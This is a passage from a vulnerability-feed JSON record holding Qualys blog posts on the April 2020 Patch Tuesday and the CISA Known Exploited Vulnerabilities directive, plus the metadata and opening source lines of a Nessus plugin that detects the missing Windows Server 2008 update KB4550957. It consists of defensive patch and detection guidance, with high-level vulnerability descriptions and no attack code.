prioritized for patching.\n\n### Hyper-V Hypervisor Escape\n\nA remote code execution vulnerability ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### SharePoint\n\nMicrosoft has also released patches for SharePoint covering four RCE vulnerabilities ([CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>)), and one XSS ([CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>)). The four RCEs involve uploading a malicious application package to exploit the vulnerabilities. These patches should be prioritized for all SharePoint servers.\n\n### Dynamics Business Central RCE\n\nSimilar to [last month's release](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Dynamics Business Central is affected by a Remote Code Execution vulnerability ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled as \u201cExploitation Less Likely,\u201d considering the target is likely a critical server, this should be prioritized across all Dynamics BC/NAV systems.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>), [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>), and [Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>). The patches for ColdFusion are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), with the others are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). All patches are labeled as \"Important.\"\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of Patch Tuesday.", "cvss3": {}, "published": "2020-04-14T18:34:04", "type": "qualysblog", "title": "April 2020 Patch Tuesday \u2013 113 Vulns, 19 Critical, Zero-Day Patches, SharePoint, Adobe ColdFusion", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0938", "CVE-2020-0974", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1027"], "modified": "2020-04-14T18:34:04", "id": "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:11:06", "description": "The remote Windows host is missing security update 4550957 or cumulative update 4550951. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0946)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1007)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1000)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550957: Windows Server 2008 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0938", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0957", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550951.NASL", "href": "https://www.tenable.com/plugins/nessus/135470", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135470);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\"\n );\n script_xref(name:\"MSKB\", value:\"4550957\");\n script_xref(name:\"MSKB\", value:\"4550951\");\n script_xref(name:\"MSFT\", value:\"MS20-4550957\");\n script_xref(name:\"MSFT\", value:\"MS20-4550951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550957: Windows Server 2008 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple 